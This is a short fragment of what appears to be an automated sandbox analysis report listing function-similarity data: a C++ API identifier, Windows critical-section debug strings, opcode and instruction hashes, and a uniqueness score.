                                                                                        • Snapshot File: hcaresult_3_2_bc0000_wlanext.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                        • API String ID: 885266447-3903918235
                                                                                        • Opcode ID: 42a327e9f9fe8c56628eb3170436e88d3c58b58dc64c97a3bd8c8ce164a9fc80
                                                                                        • Instruction ID: 88a5d5a3d55efaae925151bd760e0725c00de396db6a47c6af9fc178524108ac
                                                                                        • Opcode Fuzzy Hash: 42a327e9f9fe8c56628eb3170436e88d3c58b58dc64c97a3bd8c8ce164a9fc80
                                                                                        • Instruction Fuzzy Hash: FCF0F632200641BFD6241A55DC42F23BB6AEB44730F248315F628566E1EAA2FC20A6F0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%